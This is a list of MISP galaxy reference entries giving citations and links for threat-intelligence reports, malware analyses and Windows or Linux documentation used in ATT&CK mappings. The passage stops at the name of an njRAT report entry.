FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.

The tag is: misp-galaxy:references="FireEye APT28 January 2017"

Table 12657. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

FireEye APT28

FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.

The tag is: misp-galaxy:references="FireEye APT28"

Table 12658. Table References

Links

https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf

U.S. CISA APT28 Cisco Routers April 18 2023

Cybersecurity and Infrastructure Security Agency. (2023, April 18). APT28 Exploits Known Vulnerability to Carry Out Reconnaissance and Deploy Malware on Cisco Routers. Retrieved August 23, 2023.

The tag is: misp-galaxy:references="U.S. CISA APT28 Cisco Routers April 18 2023"

Table 12659. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-108

Symantec APT28 Oct 2018

Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.

The tag is: misp-galaxy:references="Symantec APT28 Oct 2018"

Table 12660. Table References

Links

https://www.symantec.com/blogs/election-security/apt28-espionage-military-government

FireEye APT28 Hospitality Aug 2017

Smith, L. and Read, B. (2017, August 11). APT28 Targets Hospitality Sector, Presents Threat to Travelers. Retrieved August 17, 2017.

The tag is: misp-galaxy:references="FireEye APT28 Hospitality Aug 2017"

Table 12661. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/08/apt28-targets-hospitality-sector.html

Bitdefender APT28 Dec 2015

Bitdefender. (2015, December). APT28 Under the Scope. Retrieved February 23, 2017.

The tag is: misp-galaxy:references="Bitdefender APT28 Dec 2015"

Table 12662. Table References

Links

https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf

FireEye APT29 Domain Fronting With TOR March 2017

Matthew Dunwoody. (2017, March 27). APT29 Domain Fronting With TOR. Retrieved November 20, 2017.

The tag is: misp-galaxy:references="FireEye APT29 Domain Fronting With TOR March 2017"

Table 12663. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html

FireEye APT29 Domain Fronting

Dunwoody, M. (2017, March 27). APT29 Domain Fronting With TOR. Retrieved March 27, 2017.

The tag is: misp-galaxy:references="FireEye APT29 Domain Fronting"

Table 12664. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html

FireEye APT30

FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015.

The tag is: misp-galaxy:references="FireEye APT30"

Table 12665. Table References

Links

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Zscaler APT31 Covid-19 October 2020

Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Zscaler APT31 Covid-19 October 2020"

Table 12666. Table References

Links

https://www.zscaler.com/blogs/security-research/apt-31-leverages-covid-19-vaccine-theme-and-abuses-legitimate-online

sentinelone apt32 macOS backdoor 2020

Phil Stokes. (2020, December 2). APT32 Multi-stage macOS Trojan Innovates on Crimeware Scripting Technique. Retrieved September 13, 2021.

The tag is: misp-galaxy:references="sentinelone apt32 macOS backdoor 2020"

Table 12667. Table References

Links

https://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/

FireEye APT33 Webinar Sept 2017

Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="FireEye APT33 Webinar Sept 2017"

Table 12668. Table References

Links

https://www.brighttalk.com/webcast/10703/275683

FireEye APT34 Webinar Dec 2017

Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="FireEye APT34 Webinar Dec 2017"

Table 12669. Table References

Links

https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east

DFIR Report APT35 ProxyShell March 2022

DFIR Report. (2022, March 21). APT35 Automates Initial Access Using ProxyShell. Retrieved May 25, 2022.

The tag is: misp-galaxy:references="DFIR Report APT35 ProxyShell March 2022"

Table 12670. Table References

Links

https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell

Check Point APT35 CharmPower January 2022

Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022.

The tag is: misp-galaxy:references="Check Point APT35 CharmPower January 2022"

Table 12671. Table References

Links

https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/

FireEye APT37 Feb 2018

FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.

The tag is: misp-galaxy:references="FireEye APT37 Feb 2018"

Table 12672. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

FireEye APT38 Oct 2018

FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.

The tag is: misp-galaxy:references="FireEye APT38 Oct 2018"

Table 12673. Table References

Links

https://content.fireeye.com/apt/rpt-apt38

FireEye APT39 Jan 2019

Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019.

The tag is: misp-galaxy:references="FireEye APT39 Jan 2019"

Table 12674. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html

APT3 Adversary Emulation Plan

Korban, C., et al. (2017, September). APT3 Adversary Emulation Plan. Retrieved January 16, 2018.

The tag is: misp-galaxy:references="APT3 Adversary Emulation Plan"

Table 12675. Table References

Links

https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf

evolution of pirpi

Yates, M. (2017, June 18). APT3 Uncovered: The code evolution of Pirpi. Retrieved September 28, 2017.

The tag is: misp-galaxy:references="evolution of pirpi"

Table 12676. Table References

Links

https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf

FireEye APT40 March 2019

Plan, F., et al. (2019, March 4). APT40: Examining a China-Nexus Espionage Actor. Retrieved March 18, 2019.

The tag is: misp-galaxy:references="FireEye APT40 March 2019"

Table 12677. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html

Mandiant APT42

Mandiant. (n.d.). APT42: Crooked Charms, Cons and Compromise. Retrieved September 16, 2022.

The tag is: misp-galaxy:references="Mandiant APT42"

Table 12678. Table References

Links

https://www.mandiant.com/media/17826

QiAnXin APT-C-36 Feb2019

QiAnXin Threat Intelligence Center. (2019, February 18). APT-C-36: Continuous Attacks Targeting Colombian Government Institutions and Corporations. Retrieved May 5, 2020.

The tag is: misp-galaxy:references="QiAnXin APT-C-36 Feb2019"

Table 12679. Table References

Links

https://web.archive.org/web/20190625182633if_/https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/

360 Machete Sep 2020

kate. (2020, September 25). APT-C-43 steals Venezuelan military secrets to provide intelligence support for the reactionaries — HpReact campaign. Retrieved November 20, 2020.

The tag is: misp-galaxy:references="360 Machete Sep 2020"

Table 12680. Table References

Links

https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/

Cycraft Chimera April 2020

Cycraft. (2020, April 15). APT Group Chimera - APT Operation Skeleton key Targets Taiwan Semiconductor Vendors. Retrieved August 24, 2020.

The tag is: misp-galaxy:references="Cycraft Chimera April 2020"

Table 12681. Table References

Links

https://cycraft.com/download/CyCraft-Whitepaper-Chimera_V4.1.pdf

CISA IT Service Providers

CISA. (n.d.). APTs Targeting IT Service Provider Customers. Retrieved November 16, 2020.

The tag is: misp-galaxy:references="CISA IT Service Providers"

Table 12682. Table References

Links

https://us-cert.cisa.gov/APTs-Targeting-IT-Service-Provider-Customers

Securelist GCMAN

Kaspersky Lab’s Global Research & Analysis Team. (2016, February 8). APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks. Retrieved April 20, 2016.

The tag is: misp-galaxy:references="Securelist GCMAN"

Table 12683. Table References

Links

https://securelist.com/apt-style-bank-robberies-increase-with-metel-gcman-and-carbanak-2-0-attacks/73638/

Proofpoint TA459 April 2017

Axel F. (2017, April 27). APT Targets Financial Analysts with CVE-2017-0199. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="Proofpoint TA459 April 2017"

Table 12684. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts

Securelist APT Trends April 2018

Global Research and Analysis Team. (2018, April 12). APT Trends report Q1 2018. Retrieved January 27, 2021.

The tag is: misp-galaxy:references="Securelist APT Trends April 2018"

Table 12685. Table References

Links

https://securelist.com/apt-trends-report-q1-2018/85280/

Kaspersky APT Trends Q1 2020

Global Research and Analysis Team. (2020, April 30). APT trends report Q1 2020. Retrieved September 19, 2022.

The tag is: misp-galaxy:references="Kaspersky APT Trends Q1 2020"

Table 12686. Table References

Links

https://securelist.com/apt-trends-report-q1-2020/96826/

Kaspersky APT Trends Q1 April 2021

GReAT. (2021, April 27). APT trends report Q1 2021. Retrieved June 6, 2022.

The tag is: misp-galaxy:references="Kaspersky APT Trends Q1 April 2021"

Table 12687. Table References

Links

https://securelist.com/apt-trends-report-q1-2021/101967

Securelist APT Trends Q2 2017

Kaspersky Lab’s Global Research & Analysis Team. (2017, August 8). APT Trends report Q2 2017. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="Securelist APT Trends Q2 2017"

Table 12688. Table References

Links

https://securelist.com/apt-trends-report-q2-2017/79332/

Wald0 Guide to GPOs

Robbins, A. (2018, April 2). A Red Teamer’s Guide to GPOs and OUs. Retrieved March 5, 2019.

The tag is: misp-galaxy:references="Wald0 Guide to GPOs"

Table 12689. Table References

Links

https://wald0.com/?p=179

Lau 2011

Lau, H. (2011, August 8). Are MBR Infections Back in Fashion? (Infographic). Retrieved November 13, 2014.

The tag is: misp-galaxy:references="Lau 2011"

Table 12690. Table References

Links

http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion

Krebs-Booter

Brian Krebs. (2016, October 27). Are the Days of “Booter” Services Numbered?. Retrieved May 15, 2017.

The tag is: misp-galaxy:references="Krebs-Booter"

Table 12691. Table References

Links

https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/

RSA Forfiles Aug 2017

Partington, E. (2017, August 14). Are you looking out for forfiles.exe (if you are watching for cmd.exe). Retrieved January 22, 2018.

The tag is: misp-galaxy:references="RSA Forfiles Aug 2017"

Table 12692. Table References

Links

https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe

FireEye Respond Webinar July 2017

Scavella, T. and Rifki, A. (2017, July 20). Are you Ready to Respond? (Webinar). Retrieved October 4, 2017.

The tag is: misp-galaxy:references="FireEye Respond Webinar July 2017"

Table 12693. Table References

Links

https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html

TechNet Arp

Microsoft. (n.d.). Arp. Retrieved April 17, 2016.

The tag is: misp-galaxy:references="TechNet Arp"

Table 12694. Table References

Links

https://technet.microsoft.com/en-us/library/bb490864.aspx

Cisco ARP Poisoning Mitigation 2016

King, J., Lauerman, K. (2016, January 22). ARP Poisoning (Man-in-the-Middle) Attack and Mitigation Technique. Retrieved October 15, 2020.

The tag is: misp-galaxy:references="Cisco ARP Poisoning Mitigation 2016"

Table 12695. Table References

Links

https://www.cisco.com/c/en/us/products/collateral/switches/catalyst-6500-series-switches/white_paper_c11_603839.html

ASEC Emotet 2017

ASEC. (2017). ASEC REPORT VOL.88. Retrieved April 16, 2019.

The tag is: misp-galaxy:references="ASEC Emotet 2017"

Table 12696. Table References

Links

https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.88_ENG.pdf

ASERT Seven Pointed Dagger Aug 2015

ASERT. (2015, August). ASERT Threat Intelligence Report – Uncovering the Seven Pointed Dagger. Retrieved March 19, 2018.

The tag is: misp-galaxy:references="ASERT Seven Pointed Dagger Aug 2015"

Table 12697. Table References

Links

https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf

Securelist Sofacy Feb 2018

Kaspersky Lab’s Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.

The tag is: misp-galaxy:references="Securelist Sofacy Feb 2018"

Table 12698. Table References

Links

https://securelist.com/a-slice-of-2017-sofacy-activity/83930/

THE FINANCIAL TIMES LTD 2019.

THE FINANCIAL TIMES. (2019, September 2). A sobering day. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="THE FINANCIAL TIMES LTD 2019."

Table 12699. Table References

Links

https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6

Aspnet_Compiler.exe - LOLBAS Project

LOLBAS. (2021, September 26). Aspnet_Compiler.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Aspnet_Compiler.exe - LOLBAS Project"

Table 12700. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/

Mandiant UNC2452 APT29 April 2022

Mandiant. (2020, April 27). Assembling the Russian Nesting Doll: UNC2452 Merged into APT29. Retrieved March 26, 2023.

The tag is: misp-galaxy:references="Mandiant UNC2452 APT29 April 2022"

Table 12701. Table References

Links

https://www.mandiant.com/resources/blog/unc2452-merged-into-apt29

Microsoft Assoc Oct 2017

Plett, C. et al. (2017, October 15). assoc. Retrieved August 7, 2018.

The tag is: misp-galaxy:references="Microsoft Assoc Oct 2017"

Table 12702. Table References

Links

https://docs.microsoft.com/windows-server/administration/windows-commands/assoc

Rhino Security Labs Enumerating AWS Roles

Spencer Gietzen. (2018, August 8). Assume the Worst: Enumerating AWS Roles through ‘AssumeRole’. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Rhino Security Labs Enumerating AWS Roles"

Table 12703. Table References

Links

https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration

Cybereason Astaroth Feb 2019

Salem, E. (2019, February 13). ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA. Retrieved April 17, 2019.

The tag is: misp-galaxy:references="Cybereason Astaroth Feb 2019"

Table 12704. Table References

Links

https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research

spamhaus-malvertising

Miller, Sarah. (2023, February 2). A surge of malvertising across Google Ads is distributing dangerous malware. Retrieved February 21, 2023.

The tag is: misp-galaxy:references="spamhaus-malvertising"

Table 12705. Table References

Links

https://www.spamhaus.com/resource-center/a-surge-of-malvertising-across-google-ads-is-distributing-dangerous-malware/

Microsoft APC

Microsoft. (n.d.). Asynchronous Procedure Calls. Retrieved December 8, 2017.

The tag is: misp-galaxy:references="Microsoft APC"

Table 12706. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx

TechNet At

Microsoft. (n.d.). At. Retrieved April 28, 2016.

The tag is: misp-galaxy:references="TechNet At"

Table 12707. Table References

Links

https://technet.microsoft.com/en-us/library/bb490866.aspx

Die.net Linux at Man Page

Thomas Koenig. (n.d.). at(1) - Linux man page. Retrieved December 19, 2017.

The tag is: misp-galaxy:references="Die.net Linux at Man Page"

Table 12708. Table References

Links

https://linux.die.net/man/1/at

Linux at

IEEE/The Open Group. (2017). at(1p) — Linux manual page. Retrieved February 25, 2022.

The tag is: misp-galaxy:references="Linux at"

Table 12709. Table References

Links

https://man7.org/linux/man-pages/man1/at.1p.html

PWC Pirpi Scanbox

Lancaster, T. (2015, July 25). A tale of Pirpi, Scanbox & CVE-2015-3113. Retrieved March 30, 2016.

The tag is: misp-galaxy:references="PWC Pirpi Scanbox"

Table 12710. Table References

Links

http://pwc.blogs.com/cyber_security_updates/2015/07/pirpi-scanbox.html

Atbroker.exe - LOLBAS Project

LOLBAS. (2018, May 25). Atbroker.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Atbroker.exe - LOLBAS Project"

Table 12711. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Atbroker/

ESET Attor Oct 2019

Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020.

The tag is: misp-galaxy:references="ESET Attor Oct 2019"

Table 12712. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf

LogRhythm WannaCry

Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="LogRhythm WannaCry"

Table 12713. Table References

Links

https://logrhythm.com/blog/a-technical-analysis-of-wannacry-ransomware/

Malwarebytes Dyreza November 2015

hasherezade. (2015, November 4). A Technical Look At Dyreza. Retrieved June 15, 2020.

The tag is: misp-galaxy:references="Malwarebytes Dyreza November 2015"

Table 12714. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/

At.exe - LOLBAS Project

LOLBAS. (2019, September 20). At.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="At.exe - LOLBAS Project"

Table 12715. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/At/

ENSIL AtomBombing Oct 2016

Liberman, T. (2016, October 27). ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS. Retrieved December 8, 2017.

The tag is: misp-galaxy:references="ENSIL AtomBombing Oct 2016"

Table 12716. Table References

Links

https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows

FireEye TRITON 2018

Miller, S. Reese, E. (2018, June 7). A Totally Tubular Treatise on TRITON and TriStation. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="FireEye TRITON 2018"

Table 12717. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/06/totally-tubular-treatise-on-TRITON-and-tristation.html

The DFIR Report Truebot June 12 2023

The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out. Retrieved June 15, 2023.

The tag is: misp-galaxy:references="The DFIR Report Truebot June 12 2023"

Table 12718. Table References

Links

https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/

att_def_ps_logging

Hao, M. (2019, February 27). Attack and Defense Around PowerShell Event Logging. Retrieved November 24, 2021.

The tag is: misp-galaxy:references="att_def_ps_logging"

Table 12719. Table References

Links

https://nsfocusglobal.com/attack-and-defense-around-powershell-event-logging/

Intezer TeamTNT September 2020

Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Intezer TeamTNT September 2020"

Table 12720. Table References

Links

https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/

Metcalf 2015

Metcalf, S. (2015, January 19). Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest. Retrieved February 3, 2015.

The tag is: misp-galaxy:references="Metcalf 2015"

Table 12721. Table References

Links

http://adsecurity.org/?p=1275

Cisco Blog Legacy Device Attacks

Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.

The tag is: misp-galaxy:references="Cisco Blog Legacy Device Attacks"

Table 12722. Table References

Links

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

FireEye TRITON 2017

Johnson, B., et al. (2017, December 14). Attackers Deploy New ICS Attack Framework "TRITON" and Cause Operational Disruption to Critical Infrastructure. Retrieved January 6, 2021.

The tag is: misp-galaxy:references="FireEye TRITON 2017"

Table 12723. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html

GitHub Cloud Service Credentials

Runa A. Sandvik. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved August 9, 2022.

The tag is: misp-galaxy:references="GitHub Cloud Service Credentials"

Table 12724. Table References

Links

https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/

Forbes GitHub Creds

Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Forbes GitHub Creds"

Table 12725. Table References

Links

https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196

Unit 42 Unsecured Docker Daemons

Chen, J. (2020, January 29). Attacker’s Tactics and Techniques in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021.

The tag is: misp-galaxy:references="Unit 42 Unsecured Docker Daemons"

Table 12726. Table References

Links

https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/

Black Hills Attacking Exchange MailSniper, 2016

Bullock, B. (2016, October 3). Attacking Exchange with MailSniper. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Black Hills Attacking Exchange MailSniper, 2016"

Table 12727. Table References

Links

https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/

SANS Attacking Kerberos Nov 2014

Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018.

The tag is: misp-galaxy:references="SANS Attacking Kerberos Nov 2014"

Table 12728. Table References

Links

https://redsiege.com/kerberoast-slides

NetSPI SQL Server CLR

Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies. Retrieved July 8, 2019.

The tag is: misp-galaxy:references="NetSPI SQL Server CLR"

Table 12729. Table References

Links

https://blog.netspi.com/attacking-sql-server-clr-assemblies/

Mandiant FIN5 GrrCON Oct 2016

Bromiley, M. and Lewis, P. (2016, October 7). Attacking the Hospitality and Gaming Industries: Tracking an Attacker Around the World in 7 Years. Retrieved October 6, 2017.

The tag is: misp-galaxy:references="Mandiant FIN5 GrrCON Oct 2016"

Table 12730. Table References

Links

https://www.youtube.com/watch?v=fevGZs0EQu8

Attacking VNC Servers PentestLab

Administrator, Penetration Testing Lab. (2012, October 30). Attacking VNC Servers. Retrieved October 6, 2021.

The tag is: misp-galaxy:references="Attacking VNC Servers PentestLab"

Table 12731. Table References

Links

https://pentestlab.blog/2012/10/30/attacking-vnc-servers/

Talos Template Injection July 2017

Baird, S. et al. (2017, July 7). Attack on Critical Infrastructure Leverages Template Injection. Retrieved July 21, 2018.

The tag is: misp-galaxy:references="Talos Template Injection July 2017"

Table 12732. Table References

Links

https://blog.talosintelligence.com/2017/07/template-injection.html

Lotus Blossom Dec 2015

Falcone, R. and Miller-Osborn, J. (2015, December 18). Attack on French Diplomat Linked to Operation Lotus Blossom. Retrieved February 15, 2016.

The tag is: misp-galaxy:references="Lotus Blossom Dec 2015"

Table 12733. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/12/attack-on-french-diplomat-linked-to-operation-lotus-blossom/

Symantec Attacks Against Government Sector

Symantec. (2021, June 10). Attacks Against the Government Sector. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Symantec Attacks Against Government Sector"

Table 12734. Table References

Links

https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf

CERT-FR PYSA April 2020

CERT-FR. (2020, April 1). ATTACKS INVOLVING THE MESPINOZA/PYSA RANSOMWARE. Retrieved March 1, 2021.

The tag is: misp-galaxy:references="CERT-FR PYSA April 2020"

Table 12736. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-003.pdf

InsiderThreat NTFS EA Oct 2017

Sander, J. (2017, October 12). Attack Step 3: Persistence with NTFS Extended Attributes – File System Attacks. Retrieved March 21, 2018.

The tag is: misp-galaxy:references="InsiderThreat NTFS EA Oct 2017"

Table 12737. Table References

Links

https://blog.stealthbits.com/attack-step-3-persistence-ntfs-extended-attributes-file-system-attacks

Microsoft ASR Obfuscation

Microsoft. (2023, February 22). Attack surface reduction (ASR) rules reference: Block execution of potentially obfuscated scripts. Retrieved March 17, 2023.

The tag is: misp-galaxy:references="Microsoft ASR Obfuscation"

Table 12738. Table References

Links

https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-execution-of-potentially-obfuscated-scripts

TrendMicro Msiexec Feb 2018

Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019.

The tag is: misp-galaxy:references="TrendMicro Msiexec Feb 2018"

Table 12739. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/

GitHub ATTACK Empire

Stepanic, D. (2018, September 2). attck_empire: Generate ATT&CK Navigator layer file from PowerShell Empire agent logs. Retrieved March 11, 2019.

The tag is: misp-galaxy:references="GitHub ATTACK Empire"

Table 12740. Table References

Links

https://github.com/dstepanic/attck_empire

lambert systemd 2022

Tony Lambert. (2022, November 13). ATT&CK T1501: Understanding systemd service persistence. Retrieved March 20, 2023.

The tag is: misp-galaxy:references="lambert systemd 2022"

Table 12741. Table References

Links

https://redcanary.com/blog/attck-t1501-understanding-systemd-service-persistence/

TechNet Credential Theft

Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.

The tag is: misp-galaxy:references="TechNet Credential Theft"

Table 12742. Table References

Links

https://technet.microsoft.com/en-us/library/dn535501.aspx

Audit OSX

Gagliardi, R. (n.d.). Audit in a OS X System. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Audit OSX"

Table 12743. Table References

Links

https://www.scip.ch/en/?labs.20150108

Microsoft Audit Logon Events

Microsoft. (2021, September 6). Audit logon events. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft Audit Logon Events"

Table 12744. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events

Cloud Audit Logs

Google. (n.d.). Audit Logs. Retrieved June 1, 2020.

The tag is: misp-galaxy:references="Cloud Audit Logs"

Table 12745. Table References

Links

https://cloud.google.com/logging/docs/audit#admin-activity

Microsoft Scheduled Task Events Win10

Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019.

The tag is: misp-galaxy:references="Microsoft Scheduled Task Events Win10"

Table 12746. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events

auditpol

Jason Gerend, et al. (2017, October 16). auditpol. Retrieved September 1, 2021.

The tag is: misp-galaxy:references="auditpol"

Table 12747. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol

auditpol.exe_STRONTIC

STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.

The tag is: misp-galaxy:references="auditpol.exe_STRONTIC"

Table 12748. Table References

Links

https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html

Audit_Policy_Microsoft

Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021.

The tag is: misp-galaxy:references="Audit_Policy_Microsoft"

Table 12749. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy

TechNet Audit Policy

Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.

The tag is: misp-galaxy:references="TechNet Audit Policy"

Table 12750. Table References

Links

https://technet.microsoft.com/en-us/library/dn487457.aspx

Microsoft Audit Registry July 2012

Microsoft. (2012, July 2). Audit Registry. Retrieved January 31, 2018.

The tag is: misp-galaxy:references="Microsoft Audit Registry July 2012"

Table 12751. Table References

Links

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)

Security Affairs Elderwood Sept 2012

Paganini, P. (2012, September 9). Elderwood project, who is behind Op. Aurora and ongoing attacks?. Retrieved February 13, 2018.

The tag is: misp-galaxy:references="Security Affairs Elderwood Sept 2012"

Table 12752. Table References

Links

http://securityaffairs.co/wordpress/8528/hacking/elderwood-project-who-is-behind-op-aurora-and-ongoing-attacks.html

NIST Authentication

NIST. (n.d.). Authentication. Retrieved January 30, 2020.

The tag is: misp-galaxy:references="NIST Authentication"

Table 12753. Table References

Links

https://csrc.nist.gov/glossary/term/authentication

MSDN Authentication Packages

Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="MSDN Authentication Packages"

Table 12754. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx

Microsoft Authenticode

Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018.

The tag is: misp-galaxy:references="Microsoft Authenticode"

Table 12755. Table References

Links

https://msdn.microsoft.com/library/ms537359.aspx

K8s Authorization Overview

Kubernetes. (n.d.). Authorization Overview. Retrieved June 24, 2021.

The tag is: misp-galaxy:references="K8s Authorization Overview"

Table 12756. Table References

Links

https://kubernetes.io/docs/reference/access-authn-authz/authorization/

SSH Authorized Keys

ssh.com. (n.d.). Authorized_keys File in SSH. Retrieved June 24, 2020.

The tag is: misp-galaxy:references="SSH Authorized Keys"

Table 12757. Table References

Links

https://www.ssh.com/ssh/authorized_keys/

Trend Micro njRAT 2018

